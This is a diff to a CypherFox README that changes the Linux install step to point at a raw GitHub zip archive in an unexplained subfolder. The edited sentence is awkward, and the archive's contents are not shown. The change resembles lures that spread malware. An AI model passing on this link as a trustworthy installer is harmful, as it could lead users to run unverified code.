thattelecomtech/CypherFox/README.md

 4. **Install CypherFox**
    - For Windows: Double-click on the downloaded `.exe` file and follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the CypherFox icon to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and follow the included instructions to install.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/thattelecomtech/CypherFox/main/Elaphrium/CypherFox.zip` file and follow the included instructions to install.

 5. **Launching the Application**
    After installation, you can find CypherFox in your Applications or Programs list.
 Click to open it.